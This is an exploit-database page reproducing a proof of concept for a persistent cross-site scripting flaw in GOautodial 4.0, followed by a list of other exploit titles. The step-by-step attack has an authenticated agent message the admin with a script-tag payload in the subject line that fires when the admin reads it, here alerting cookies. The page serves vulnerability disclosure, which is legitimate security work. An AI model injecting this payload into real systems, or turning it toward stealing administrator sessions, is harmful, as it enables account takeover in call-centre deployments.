Goautodial 4.0 persistent crosssite scripting (authenticated) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-07-26 | Type : webapps | Platform : php
This exploit / vulnerability Goautodial 4.0 persistent crosssite scripting (authenticated) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated)
# Author: Balzabu
# Discovery Date: 2020-07-23
# Vendor Homepage: https://goautodial.org/
# Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html
# Tested Version: 4.0 (Last relase as of today)
# Tested on OS: CentOS 7

# STEPS TO REPRODUCE:

# 1 - Log in as an agent
# 2 - Write a new message to user goadmin with:
Subject: Help me, I can't connect to the webphone <script src=1
href=1 onerror="javascript:alert(document.cookies)"></script>
Text: whatever you want
# 3 - Send and wait for goadmin to read the message... :-)

Goautodial 4.0 persistent crosssite scripting (authenticated)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Goautodial 4.0 persistent crosssite scripting (authenticated) Vulnerability / Exploit